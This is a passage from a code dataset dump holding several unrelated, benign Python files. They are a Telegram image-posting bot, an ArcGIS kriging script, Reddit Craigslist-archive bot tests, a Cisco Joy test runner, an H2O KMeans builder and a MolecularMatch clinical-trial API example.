img_post.save()\n with open(img_post.path, 'rb') as f:\n bot.send_media_group('@auto_it_news', [telebot.types.InputMediaPhoto(\n f, caption=f'{post[6]}', parse_mode='markdown'\n )])\n os.remove(img_post.path)\n return\n else:\n for url in urls:\n url = url.rstrip()\n path = url.split('/')[-1].split('.')\n path = '../' + '_'.join(path[:-1]) + f'.{path[-1]}'\n paths.append(path)\n if url.split('.')[-1] in IMAGE_EXTENSION:\n with open(path, 'wb') as file:\n file.write(requests.get(url).content)\n files.append(open(path, 'rb'))\n try:\n bot.send_media_group(\n '@auto_it_news',\n [telebot.types.InputMediaPhoto(files[0], f'{message}', parse_mode='markdown')] +\n [telebot.types.InputMediaPhoto(f) for f in files[1:]]\n )\n except Exception as e:\n print(e)\n for file in files:\n file.close()\n for path in paths:\n os.remove(path)\n time.sleep(20)\n\n\ndef check() -> None:\n while True:\n try:\n push_post()\n except Exception as e:\n print(e)\n time.sleep(TIME_UPDATE_MINUTES * 60)\n\n\nif __name__ == '__main__':\n check()\n","sub_path":"telegram_bot/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"366198616","text":"# coding=utf-8\nfrom urllib import urlretrieve\nimport threading\nimport time,glob,xlrd\nimport os\nimport pandas as pd\nimport csv\nfrom selenium import webdriver\nimport traceback\nimport numpy as np \nimport arcpy\nimport os.path\nfrom arcpy import env\nfrom arcpy.sa import *\n\n# 2019年8月12日11点35分\n# 常熟市空气质量预报系统\n# 20190808\n\n# Check out the ArcGIS Geostatistical Analyst extension license\narcpy.CheckOutExtension(\"GeoStats\")\n# Check out the ArcGIS Spatial Analyst extension license\narcpy.CheckOutExtension(\"Spatial\")\n# Obtain a license for the ArcGIS 3D Analyst extension\narcpy.CheckOutExtension(\"3D\")\n\ndef EBK_ga(inPointFeatures,outPath):\n try:\n arcpy.AddField_management(inPointFeatures, \"PM102\", \"FLOAT\", 9)\n except :\n traceback.print_exc()\n try:\n arcpy.CalculateField_management (inPointFeatures, 'PM102', \"float(!PM10__μg_!)\", \"PYTHON_9.3\")\n except :\n traceback.print_exc()\n \n name=os.path.split(inPointFeatures)[1][:-4]\n outRaster=os.path.join(outPath,name+'.tif')\n cellSize = 0.01\n transformation = \"NONE\"\n maxLocalPoints = 50\n overlapFactor = 0.5\n numberSemivariograms = 100\n # Set variables for search neighborhood\n radius = 1.0\n smooth = 0.14\n try:\n #lyr to shp\n searchNeighbourhood = arcpy.SearchNeighborhoodSmoothCircular(radius, smooth)\n except Exception as err:\n arcpy.AddMessage(\"SearchNeighborhoodSmoothCircular: \"+\" Failed\")\n arcpy.AddMessage(err.message)\n outputType = \"PREDICTION\"\n Output_geostatistical_layer=''\n quantileValue = \"\"\n thresholdType = \"\"\n probabilityThreshold = \"\"\n semivariogram = \"POWER\"\n tempEnvironment0 = arcpy.env.extent\n arcpy.env.extent = Extent\n # Execute EmpiricalBayesianKriging\n start =time.time()\n try:\n arcpy.EmpiricalBayesianKriging_ga(inPointFeatures, 'PM102', Output_geostatistical_layer ,outRaster,\n cellSize, transformation, maxLocalPoints, overlapFactor,\n numberSemivariograms,\n searchNeighbourhood, outputType, quantileValue, thresholdType,\n probabilityThreshold)\n print ('Converting {} to {}'.format(inPointFeatures, outRasNa))\n arcpy.AddMessage(normaltime+\":\"+\"经验贝叶斯克里金插值完成\") \n except Exception as err:\n arcpy.AddMessage(\"EmpiricalBayesianKriging_ga: \"+\" Failed\")\n arcpy.AddMessage(err.message)\n end =time.time()\n print('Running time: %s Seconds'%(end-start))\n arcpy.env.extent = tempEnvironment0 \n\ndef getHourPath(date,hour):\n ho=str(hour) if (hour>9) else '0'+str(hour)\n print('11'+date+ho)\n return '11'+date+ho\n\nif __name__ == '__main__':\n path=u'F:\\\\常熟溯源\\\\矢量数据21'\n pathDir = os.listdir(path)\n for PointFeatures in pathDir:\n if PointFeatures[-4:].lower() == '.shp':\n inPointFeatures=os.path.join(path,PointFeatures)\n try:\n print('-------------- '+inPointFeatures+' -----------------------')\n EBK_ga(inPointFeatures,u'F:\\\\插值结果\\\\矢量数据21')\n except:\n traceback.print_exc()\n ","sub_path":"res.py","file_name":"res.py","file_ext":"py","file_size_in_byte":3266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"349163494","text":"import unittest\nimport logging\nfrom copy import deepcopy\nfrom unittest.mock import Mock\n\nfrom archivebot import bot, custommodels\n\n\n# disable application logging during tests\nlogging.disable(logging.CRITICAL)\n\n\nclass TestExtraction(unittest.TestCase):\n\t\"\"\"\n\tThere will usually only be one craigslist url, but because there can be\n\tmore than one, `scrape_url` always returns a list.\n\t\"\"\"\n\tdef setUp(self):\n\t\tself.body = '''\n\t\tMy fiancé and I are desperately trying to find an apartment. Of course we found one of [Craigslist](%url%) for an amazing price. We assumed it was priced the way it was because it was furnished. They said they would mail the keys to us, after we make a payment. I said to them no, that we would like to view the apartment, and if anything would be mailed to us, it should be the lease agreement. That we could wait for the keys, and don’t want to send money just to view a space.\n\t\tMy dilemma is I have given them my name, date of birth and address. I even sent a picture of my fiancé and myself because they sent a photo of their “family”.\n\t\tIn fact another “landlord” said he was also overseas and the situations were similar, so I thought “Oh, people must do this all the time. We are in an age of internet and communications. You don’t need to meet in person anymore!”\n\t\tI didn’t think anything of it, until they responded to my message insisting that we trust one another.\n\t\tAfter that I told them I would have to decline their offer.\n\t\tThe other situation, someone actually called me explaining the details of the property, and what I could expect. They also said they would call to speak to me further. It was the landlords realtor representative. However again, they expect me to send money.\n\t\tCan they do anything with my information?\n\t\tI’ve already received notifications in my e-mail that someone tried to sign in my paypal.\n\t\tI provided first and last name, Date of birth Phone number Address\n\t\tMy paypal is not updated with my current phone number. Which is why I think they couldn’t get in.\n\t\t%url2%'''\n\n\tdef test_ExtractUrls_GivenFullUrl_ReturnsUrl(self):\n\t\turl = 'https://indianapolis.craigslist.org/bar/d/bears/6451661128.html'\n\t\ttext = self.body.replace('%url%', url)\n\t\tself.assertEqual(len(bot.extract_urls(text)), 1)\n\n\tdef test_ExtractUrls_GivenFullUrlWithOnlyHTTP_ReturnsUrl(self):\n\t\turl = 'http://indianapolis.craigslist.org/bar/d/bears/6451661128.html'\n\t\ttext = self.body.replace('%url%', url)\n\t\tself.assertEqual(len(bot.extract_urls(text)), 1)\n\n\tdef test_ExtractUrls_GivenMultipleUrls_ReturnsMultipleUrls(self):\n\t\turl = 'http://indianapolis.craigslist.org/bar/d/bears/6451661128.html'\n\t\turl2 = 'https://dallas.craigslist.org/ftw/zip/d/20000-pounds-free-remotes/6426178725.html'\n\t\ttext = self.body.replace('%url%', url)\n\t\ttext = text.replace('%url2%', url)\n\t\tself.assertEqual(len(bot.extract_urls(text)), 2)\n\n\tdef test_ExtractUrls_GivenForumUrl_ReturnsEmptyList(self):\n\t\turl = 'https://forums.craigslist.org/?forumID=3'\n\t\ttext = self.body.replace('%url%', url)\n\t\tself.assertEqual(len(bot.extract_urls(text)), 0)\n\n\tdef test_ExtractUrls_GivenCraigslistScamsPage_ReturnsEmptyList(self):\n\t\turl = 'https://www.craigslist.org/about/scams'\n\t\ttext = self.body.replace('%url%', url)\n\t\tself.assertEqual(len(bot.extract_urls(text)), 0)\n\n\tdef test_ExtractUrls_GivenCraigslistScamsPageWithRegularHTTP_ReturnsEmptyList(self):\n\t\turl = 'http://www.craigslist.org/about/scams'\n\t\ttext = self.body.replace('%url%', url)\n\t\tself.assertEqual(len(bot.extract_urls(text)), 0)\n\n\tdef test_ExtractUrls_GivenCraigslistSearchPage_ReturnsEmptyList(self):\n\t\turl = 'https://tampa.craigslist.org/d/for-sale/search/sss'\n\t\ttext = self.body.replace('%url%', url)\n\t\tself.assertEqual(len(bot.extract_urls(text)), 0)\n\n\tdef test_ExtractUrls_GivenCraigslistTermsPage_ReturnsEmptyList(self):\n\t\turl = 'https://www.craigslist.org/about/terms.of.use'\n\t\ttext = self.body.replace('%url%', url)\n\t\tself.assertEqual(len(bot.extract_urls(text)), 0)\n\n\tdef test_ExtractUrls_GivenNonCraigslistPage_ReturnsEmptyList(self):\n\t\turl = 'https://www.google.com'\n\t\ttext = self.body.replace('%url%', url)\n\t\tself.assertEqual(len(bot.extract_urls(text)), 0)\n\n\tdef test_ExtractUrls_GivenNonCraigslistPageEndingWithHtml_ReturnsEmptyList(self):\n\t\turl = 'https://www.google.com/about.html'\n\t\ttext = self.body.replace('%url%', url)\n\t\tself.assertEqual(len(bot.extract_urls(text)), 0)\n\n\nclass TestBot(unittest.TestCase):\n\tdef setUp(self):\n\t\tself.mock_submission = Mock(selftext='abc', comment_sort='', url='')\n\t\tself.mock_comment = Mock(body='xyz')\n\t\tself.mock_submission.reply = Mock(return_value=None)\n\t\tself.mock_comment.reply = Mock(return_value=None)\n\n\tdef test_RedditPost_GivenSubmission_PullsTextFromSelftext(self):\n\t\tpost = bot.RedditPost(self.mock_submission)\n\t\tself.assertEqual(post.text, self.mock_submission.selftext)\n\n\tdef test_RedditPost_GivenComment_PullsTextFromBody(self):\n\t\tpost = bot.RedditPost(self.mock_comment)\n\t\tself.assertEqual(post.text, self.mock_comment.body)\n\n\tdef test_RedditPost_ReplyToSubmission_CallsPrawReply(self):\n\t\tpost = bot.RedditPost(self.mock_submission)\n\t\tpost.reply('')\n\t\tself.mock_submission.reply.assert_called()\n\n\tdef test_RedditPost_ReplyToComment_CallsPrawReply(self):\n\t\tpost = bot.RedditPost(self.mock_comment)\n\t\tpost.reply('')\n\t\tself.mock_comment.reply.assert_called()\n\n\nclass TestPageRequest(unittest.TestCase):\n\tdef setUp(self):\n\t\tself.url = 'http://indianapolis.craigslist.org/bar/d/bears/6451661128.html'\n\n\tdef test_RequestPage_GivenValidUrl_ReturnsTextOfPage(self):\n\t\tresponse = Mock(ok=True, text='')\n\t\twith unittest.mock.patch('archivebot.bot.requests.get') as patch:\n\t\t\tpatch.return_value = response\n\t\t\tself.assertEqual('', bot.request_page(self.url))\n\n\tdef test_RequestPage_GivenInvalidUrl_RaisesError(self):\n\t\tresponse = Mock(status_code=404, ok=False)\n\t\twith unittest.mock.patch('archivebot.bot.requests.get') as patch:\n\t\t\tpatch.return_value = response\n\t\t\twith self.assertRaises(bot.PageNotFoundError):\n\t\t\t\tbot.request_page(self.url)\n\n\tdef test_RequestPage_ServerError_RaisesError(self):\n\t\tresponse = Mock(status_code=500, ok=False)\n\t\twith unittest.mock.patch('archivebot.bot.requests.get') as patch:\n\t\t\tpatch.return_value = response\n\t\t\twith self.assertRaises(bot.PageUnavailableError):\n\t\t\t\tbot.request_page(self.url)\n\n\nclass TestFormat(unittest.TestCase):\n\tdef setUp(self):\n\t\timages = [\n\t\t\t'https://i.imgur.com/abcd001.jpg',\n\t\t\t'https://i.imgur.com/abcd002.jpg',\n\t\t\t'https://i.imgur.com/abcd003.jpg'\n\t\t\t]\n\t\tself.ad = custommodels.CraigslistAd(\n\t\t\ttitle='Post title',\n\t\t\tbody='Post description line 1.\\n\\nPost description line 2.',\n\t\t\turl='http://indianapolis.craigslist.org/bar/d/bears/6451661128.html',\n\t\t\t)\n\t\tself.archive = custommodels.Archive(\n\t\t\turl='https://imgur.com/a/zzzz1', title='xxx',\n\t\t\tad=self.ad, screenshot='https://i.imgur.com/abcd000.jpg',\n\t\t\timages=images)\n\n\tdef test_Formatter_GivenArchive_FormatsTitle(self):\n\t\tformatter = bot.PostFormatter()\n\t\tself.assertIn('### Post title ###', formatter.format(self.archive))\n\n\tdef test_Formatter_GivenArchive_FormatsTitleAsQuote(self):\n\t\tformatter = bot.PostFormatter()\n\t\tself.assertIn('> ### Post title ###', formatter.format(self.archive))\n\n\tdef test_Formatter_GivenOriginalPost_FormatsOriginalPost(self):\n\t\tformatter = bot.PostFormatter()\n\t\tlinktext = '[original post](http://indianapolis.craigslist.org/bar/d/bears/6451661128.html)'\n\t\tself.assertIn(linktext, formatter.format(self.archive))\n\n\tdef test_Formatter_GivenAlbumUrl_FormatsAlbumUrl(self):\n\t\tformatter = bot.PostFormatter()\n\t\tlinktext = '[imgur album](https://imgur.com/a/zzzz1)'\n\t\tself.assertIn(linktext, formatter.format(self.archive))\n\n\tdef test_Formatter_GivenScreenshot_FormatsScreenshot(self):\n\t\tformatter = bot.PostFormatter()\n\t\tlinktext = '[screenshot](https://i.imgur.com/abcd000.jpg)'\n\t\tself.assertIn(linktext, formatter.format(self.archive))\n\n\tdef test_Formatter_GivenAdBody_FormatsAdBody(self):\n\t\tformatter = bot.PostFormatter()\n\t\ttext = 'Post description line 1'\n\t\tself.assertIn(text, formatter.format(self.archive))\n\n\tdef test_Formatter_GivenAdBody_FormatsAdBodyAsQuote(self):\n\t\tformatter = bot.PostFormatter()\n\t\ttext = '> Post description line 1'\n\t\tself.assertIn(text, formatter.format(self.archive))\n\n\tdef test_Formatter_GivenMultiLineAdBody_FormatsAllLinesAsQuote(self):\n\t\tformatter = bot.PostFormatter()\n\t\ttext = '> Post description line 1.\\n>\\n> Post description line 2.'\n\t\tself.assertIn(text, formatter.format(self.archive))\n\n\tdef test_Formatter_GivenMultipleImages_FormatsImages(self):\n\t\tformatter = bot.PostFormatter()\n\t\ttext = '[image 1](https://i.imgur.com/abcd001.jpg) | [image 2](https://i.imgur.com/abcd002.jpg) | [image 3](https://i.imgur.com/abcd003.jpg)'\n\t\tself.assertIn(text, formatter.format(self.archive))\n\n\tdef test_Formatter_GivenImage_FormatsImagesAsQuote(self):\n\t\tformatter = bot.PostFormatter()\n\t\ta = deepcopy(self.archive)\n\t\ta.images = a.images[:1]\n\t\ttext = '> [image 1](https://i.imgur.com/abcd001.jpg)'\n\t\tself.assertIn(text, formatter.format(a))\n\n\tdef test_Formatter_GivenMultipleImage_FormatsImagesAsQuote(self):\n\t\tformatter = bot.PostFormatter()\n\t\ttext = '> [image 1](https://i.imgur.com/abcd001.jpg) | [image 2](https://i.imgur.com/abcd002.jpg) | [image 3](https://i.imgur.com/abcd003.jpg)'\n\t\tself.assertIn(text, formatter.format(self.archive))\n\n\tdef test_Formatter_GivenNoImages_HasNoTrailingQuoteMarks(self):\n\t\tformatter = bot.PostFormatter()\n\t\ta = deepcopy(self.archive)\n\t\ta.images = []\n\t\tself.assertIn('> Post description line 2.\\n', formatter.format(a))\n\t\tself.assertNotIn('> Post description line 2.\\n>', formatter.format(a))\n\n\tdef test_Formatter_GivenMultipleImages_ReturnsCorrectFullReply(self):\n\t\texpected_reply = (\n\t\t\t'This Craigslist post has been archived so it can continue to be viewed after expiration.\\n\\n'\n\t\t\t'[original post](http://indianapolis.craigslist.org/bar/d/bears/6451661128.html) | [imgur album](https://imgur.com/a/zzzz1) | [screenshot](https://i.imgur.com/abcd000.jpg)\\n\\n'\n\t\t\t'> ### Post title ###\\n'\n\t\t\t'>\\n'\n\t\t\t'> Post description line 1.\\n'\n\t\t\t'>\\n'\n\t\t\t'> Post description line 2.\\n'\n\t\t\t'>\\n'\n\t\t\t'> [image 1](https://i.imgur.com/abcd001.jpg) | [image 2](https://i.imgur.com/abcd002.jpg) | [image 3](https://i.imgur.com/abcd003.jpg)\\n\\n'\n\t\t\t'***\\n\\n'\n\t\t\t'[^github](https://github.com/darricktheprogrammer/reddit-cl-bot) ^| [^send ^message/report](/#)'\n\t\t\t)\n\t\tformatter = bot.PostFormatter()\n\t\tself.assertEqual(expected_reply, formatter.format(self.archive))\n\n\tdef test_Formatter_GivenSingleImage_ReturnsCorrectFullReply(self):\n\t\texpected_reply = (\n\t\t\t'This Craigslist post has been archived so it can continue to be viewed after expiration.\\n\\n'\n\t\t\t'[original post](http://indianapolis.craigslist.org/bar/d/bears/6451661128.html) | [imgur album](https://imgur.com/a/zzzz1) | [screenshot](https://i.imgur.com/abcd000.jpg)\\n\\n'\n\t\t\t'> ### Post title ###\\n'\n\t\t\t'>\\n'\n\t\t\t'> Post description line 1.\\n'\n\t\t\t'>\\n'\n\t\t\t'> Post description line 2.\\n'\n\t\t\t'>\\n'\n\t\t\t'> [image 1](https://i.imgur.com/abcd001.jpg)\\n\\n'\n\t\t\t'***\\n\\n'\n\t\t\t'[^github](https://github.com/darricktheprogrammer/reddit-cl-bot) ^| [^send ^message/report](/#)'\n\t\t\t)\n\t\ta = deepcopy(self.archive)\n\t\ta.images = a.images[:1]\n\t\tformatter = bot.PostFormatter()\n\t\tself.assertEqual(expected_reply, formatter.format(a))\n\n\tdef test_Formatter_GivenNoImages_ReturnsCorrectFullReply(self):\n\t\texpected_reply = (\n\t\t\t'This Craigslist post has been archived so it can continue to be viewed after expiration.\\n\\n'\n\t\t\t'[original post](http://indianapolis.craigslist.org/bar/d/bears/6451661128.html) | [imgur album](https://imgur.com/a/zzzz1) | [screenshot](https://i.imgur.com/abcd000.jpg)\\n\\n'\n\t\t\t'> ### Post title ###\\n'\n\t\t\t'>\\n'\n\t\t\t'> Post description line 1.\\n'\n\t\t\t'>\\n'\n\t\t\t'> Post description line 2.\\n\\n'\n\t\t\t'***\\n\\n'\n\t\t\t'[^github](https://github.com/darricktheprogrammer/reddit-cl-bot) ^| [^send ^message/report](/#)'\n\t\t\t)\n\t\ta = deepcopy(self.archive)\n\t\ta.images = []\n\t\tformatter = bot.PostFormatter()\n\t\tself.assertEqual(expected_reply, formatter.format(a))\n\n\nif __name__ == '__main__':\n\tunittest.main()\n","sub_path":"test/test-bot.py","file_name":"test-bot.py","file_ext":"py","file_size_in_byte":12033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"649723096","text":"#!/usr/bin/env python\n\"\"\"\n *\n * Copyright (c) 2016 Cisco Systems, Inc.\n * All rights reserved.\n *\n * Redistribution and use in source and binary forms, with or without\n * modification, are permitted provided that the following conditions\n * are met:\n *\n * Redistributions of source code must retain the above copyright\n * notice, this list of conditions and the following disclaimer.\n *\n * Redistributions in binary form must reproduce the above\n * copyright notice, this list of conditions and the following\n * disclaimer in the documentation and/or other materials provided\n * with the distribution.\n *\n * Neither the name of the Cisco Systems, Inc. nor the names of its\n * contributors may be used to endorse or promote products derived\n * from this software without specific prior written permission.\n *\n * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n * \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\n * FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE\n * COPYRIGHT HOLDERS OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,\n * INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)\n * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,\n * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED\n * OF THE POSSIBILITY OF SUCH DAMAGE.\n *\n\"\"\"\n\nimport logging\nimport argparse\nfrom pytests_joy.ipfix import main_ipfix\nfrom pytests_joy.tls import main_tls\n\n\ndef modify_test_suite(suite, module_flag, module_func, single_module):\n \"\"\"\n Change the list of test modules that will be run.\n :param suite: List of test modules\n :param module_flag: A flag corresponding to a single module, given through CLI\n :param module_func: The entry point function of the selected test module\n :param single_module: If it exists, the current selection for SINGLE (1 only) module to run.\n :return:\n \"\"\"\n if module_flag == 'no':\n # Exclude the specified module\n suite.remove(module_func)\n return None\n elif module_flag == 'yes':\n # Only test the specified module\n if single_module:\n logger.error(str(single_module) + ' has been selected to run by itself. ' +\n 'only 1 module can be run individually.')\n exit(1)\n for test in suite:\n if test is not module_func:\n suite.remove(test)\n return module_func\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description='Defaults to run all of pytests_joy modules. ' +\n 'Please use the listed module options to select a subset.'\n )\n parser.add_argument('-l', '--log',\n dest='log_level',\n choices=['debug', 'info', 'warning', 'error', 'critical'],\n help='Set the logging level')\n parser.add_argument('--log-file',\n action='store_true',\n dest='log_file',\n help='Log messages to a file instead of the console (terminal).')\n parser.add_argument('--ipfix',\n dest='flag_ipfix',\n choices=['yes', 'no'],\n help='yes to run ONLY ipfix module; no to exclude from test suite')\n parser.add_argument('--tls',\n dest='flag_tls',\n choices=['yes', 'no'],\n help='yes to run ONLY tls module; no to exclude from test suite')\n parser.add_argument('--tls-base-dir',\n dest='tls_base_dir',\n help='Specify the absolute path to directory where tls baseline files will reside.')\n parser.add_argument('--tls-pcap-dir',\n dest='tls_pcap_dir',\n help='Specify the absolute path to directory where tls pcap files currently exist.')\n parser.add_argument('--tls-make-base',\n action='store_true',\n dest='tls_make_base',\n help='Use to create a new set of tls baseline files. ')\n parser.add_argument('--tls-base-file-generic',\n action='store_true',\n dest='tls_base_generic',\n help='Use a generic default name when making baseline files. ' +\n 'Caution: overwrite of previous files with same name is probable!')\n args = parser.parse_args()\n\n \"\"\"\n Configure logging\n \"\"\"\n LEVELS = {'debug': logging.DEBUG,\n 'info': logging.INFO,\n 'warning': logging.WARNING,\n 'error': logging.ERROR,\n 'critical': logging.CRITICAL}\n\n log_level = None\n if args.log_level:\n log_level = LEVELS[args.log_level.lower()]\n\n log_file = None\n if args.log_file:\n logging.basicConfig(\n filename='pytest-joy.log',\n level=log_level,\n format='%(asctime)s - {%(filename)s:%(lineno)d} - %(levelname)s - %(message)s',\n )\n else:\n logging.basicConfig(\n level=log_level,\n format='%(name)s: %(levelname)s %(message)s',\n )\n\n logger = logging.getLogger(__name__)\n\n \"\"\"\n Add a new test:\n 1: Import the module that contains test\n 2: Add the test function reference to the 'test_suite' list below\n \"\"\"\n test_suite = [main_ipfix, main_tls, ]\n\n single_mod = None\n if args.flag_ipfix:\n single_mod = modify_test_suite(test_suite, args.flag_ipfix, main_ipfix, single_mod)\n if args.flag_tls:\n single_mod = modify_test_suite(test_suite, args.flag_tls, main_tls, single_mod)\n\n logger.warning('runtests start...')\n logger.warning('~~~~~~~~~~~~~~~~~')\n\n for test in test_suite:\n if test is main_tls:\n # Invoke with proper parameter values for TLS\n rc_main = main_tls(args.tls_base_dir, args.tls_pcap_dir,\n args.tls_make_base, args.tls_base_generic)\n else:\n rc_main = test()\n if rc_main != 0:\n logger.warning('FAILED')\n exit(rc_main)\n\n logger.warning('SUCCESS')\n exit(0)\n","sub_path":"joy-master/test/run_tests.py","file_name":"run_tests.py","file_ext":"py","file_size_in_byte":6469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"68685087","text":"\"\"\"\nA KMeans model builder.\n\"\"\"\n\nfrom h2o_model_builder import H2OModelBuilder\n\n\nclass H2OKMeansBuilder(H2OModelBuilder):\n \"\"\"\n Build a new KMeans model.\n\n Example Usage:\n\n from h2o.model.km_builder import H2OKMeans # import this builder\n\n my_km = H2OKMeans() # create a new kmeans object\n my_km.x = [0,1,2,3] # fill in parameters:\n my_km.training_frame = \n my_km.k = 5\n my_km.max_iterations = 100\n my_km.init = \"PlusPlus\"\n\n my_km.fit() # perform the model fit\n \"\"\"\n\n SELF = \"kmeans\"\n\n def __init__(self, x=None, k=5, training_frame=None, key=None, max_iterations=1000,\n standardize=True, init=(\"Furthest\", \"Random\", \"PlusPlus\"), seed=None):\n \"\"\"\n Instantiate a KMeansBuilder.\n :param x: Columns to use for clustering (may be indices or strings).\n :param k: Number of clusters (must be between 1 and 1e7 inclusive).\n :param training_frame: An object of type H2OFrame.\n :param key: The output name of the model.\n :param max_iterations: The maximum number of iterations allowed\n (must be between 0 and 1e6 inclusive).\n :param standardize: Whether data should be standardized before clustering.\n :param init: How to select initial set of cluster points. Random for random\n initialization, Furthest for initialization at furthest point from\n successive centers, and PlusPlus for k-means++.\n :param seed: A random seed.\n :return: A new KMeansBuilder.\n \"\"\"\n super(H2OKMeansBuilder, self).__init__(locals(), self.SELF, training_frame)\n self.__dict__.update(locals())\n\n # deal with \"tuple\" defaults\n self.init = \"Random\" if isinstance(init, tuple) else init\n","sub_path":"h2o-py/h2o/model/h2o_km_builder.py","file_name":"h2o_km_builder.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"253982050","text":"# MolecularMatch API (MM-DATA) Python Example Sheet\n# Based on documentation at https://api.molecularmatch.com\n# Author: Shane Neeley, MolecularMatch Inc., Jan. 30, 2018\n\nimport requests\nimport json\nimport numpy as np\nimport sys\n\nresourceURLs = {\n\t\"trialSearch\": \"/v2/search/trials\",\n\t\"drugSearch\": \"/v2/search/drugs\",\n\t\"publicationSearch\": \"/v2/search/publications\",\n\t\"mutationGet\": \"/v2/mutation/get\",\n\t\"geneGet\": \"/v2/gene/get\",\n\t\"mutationClassify\": \"/v2/mutation/classify\",\n\t\"validateTerms\": \"/v2/validate/terms\",\n\t\"assertionSearch\": \"/v2/search/assertions\",\n\t\"assertionExport\": \"/v2/export/assertions\"\n}\nmmService = \"https://api.molecularmatch.com\"\n\n# CHANGE THIS TO YOUR KEY or use as parameter (e.g. $ python3 publicationsAPI.py key)\napiKey = ''\nif apiKey == '' and sys.argv[1]:\n\tapiKey = sys.argv[1]\n\n#// TODO: geolocation searches\n\n#####################search trials##################################\n\nurl = mmService + resourceURLs[\"trialSearch\"]\nfilters = [{'facet':'CONDITION','term':'Lung cancer'}]\npayload = {\n\t'apiKey': apiKey,\n\t'filters': filters\n}\nr = requests.post(url, json=payload)\nprint(json.dumps(r.json()))\n\n##################################################################\n#####################SCENARIOS####################################\n##################################################################\n\n#### Clinical trial reporting\n\n# When looking up trials for an actual patient, it is important to include the filters of Enrolling and Interventional\nurl = mmService + resourceURLs[\"trialSearch\"]\nfilters = [\n\t{\"facet\":\"CONDITION\",\"term\":\"Colorectal cancer\"},\n\t{\"facet\":\"MUTATION\",\"term\":\"BRAF V600E\"},\n\t{\"facet\":\"STATUS\", \"term\":\"Enrolling\"},\n\t{\"facet\":\"TRIALTYPE\", \"term\":\"Interventional\"},\n\t{\"facet\":\"COUNTRY\", \"term\":\"France\"}\n]\npayload = {\n\t'apiKey': apiKey,\n\t'filters': filters\n}\nr = requests.post(url, json=payload)\n\n# Question: how many trials for a patient with this mutation and disease are interventional and enrolling in France?\nprint(r.json()['total'])\n# Answer: 4\n\n# Question: what are these trials ClinicalTrials.gov IDs and titles and email addresses for contact?\nfor i in np.arange(0, len(r.json()['rows']) ):\n\tprint(r.json()['rows'][i]['id'])\n\tprint(r.json()['rows'][i]['briefTitle'])\n\tprint(r.json()['rows'][i]['overallContact'])\n# Answer:\n# NCT02291289 - A Multi-Center Study of Biomarker-Driven Therapy in Metastatic Colorectal Cancer - global.rochegenentechtrials@roche.com\n# NCT01677741 - A Study to Determine Safety, Tolerability and Pharmacokinetics of Oral Dabrafenib In Children and Adolescent Subjects - GSKClinicalSupportHD@gsk.com\n# NCT02788279 - A Study to Investigate Efficacy and Safety of Cobimetinib Plus Atezolizumab and Atezolizumab Monotherapy Versus Regorafenib in Participants With Metastatic Colorectal Adenocarcinoma - global.rochegenentechtrials@roche.com\n# NCT02751177 - Detection of KRAS, NRAS et BRAF Mutations in Plasma Circulating DNA From Patients With Metastatic Colorectal Cancer - v.gillon@nancy.unicancer.fr\n\n# Question: what are all the mutations that are associated with trial NCT02291289?\nfilters = [\n\t{\"facet\":\"ID\",\"term\":\"NCT02291289\"}\n]\npayload = {\n\t'apiKey': apiKey,\n\t'filters': filters\n}\nr = requests.post(url, json=payload)\n# Note: must have tags activated on api key for this to work. Not all api key users get tags.\nfor tag in r.json()['rows'][0]['tags']:\n\tif tag['facet'] == \"MUTATION\":\n\t\tprint(tag)\n\n# Answer:\n# 3 mutations are for inclusion criteria\n# {'facet': 'MUTATION', 'term': 'EGFR P546S', 'alias': 'EGFR P546S', 'priority': '0', 'filterType': 'include'}\n# {'facet': 'MUTATION', 'term': 'BRAF V600E', 'alias': 'BRAF V600E', 'priority': '0', 'filterType': 'include'}\n# {'facet': 'MUTATION', 'term': 'Microsatellite instability', 'alias': 'Microsatellite instability', 'priority': '0', 'filterType': 'include'}\n# 2 mutations are for exclusion criteria (filterType = 'exclude')\n# {'facet': 'MUTATION', 'term': 'EGFR S492R', 'alias': 'EGFR S492R', 'priority': 1, 'filterType': 'exclude'}\n# {'facet': 'MUTATION', 'term': 'BRAF G469L', 'alias': 'BRAF G469L', 'priority': 1, 'filterType': 'exclude'}\n\n# See more about the trial data model at: https://api.molecularmatch.com/#trialDataModel\n\n#### Mutation details lookup\n\n# So you want to know everything there is to know about BRAF V600E?\n\nurl = mmService + resourceURLs[\"mutationGet\"]\npayload = {\n\t'apiKey': apiKey,\n\t'name': 'BRAF V600E'\n}\nr = requests.get(url, params=payload)\n\n# Question: what databases have reported this mutation?\nprint(r.json()['sources'])\n# Answer: 'COSMIC', 'CIViC', 'DoCM', 'cBioPortal', 'ClinVar'\n\n# Question: is there a known protein domain this mutation is in?\nfor i in r.json()['parents']:\n\tif (i['type'] == 'domain'):\n\t\tprint(i)\n# Answer: BRAF Pkinase_Tyr domain (protein tyrosine kinase domain)\n\n# What is the clinical interpretation of BRAF V600E? Are there trials, drugs, publications about it?\n\nurl = mmService + resourceURLs[\"mutationClassify\"]\npayload = {\n\t'apiKey': apiKey,\n\t'variant': 'BRAF V600E',\n\t'condition': 'Lung cancer'\n}\nr = 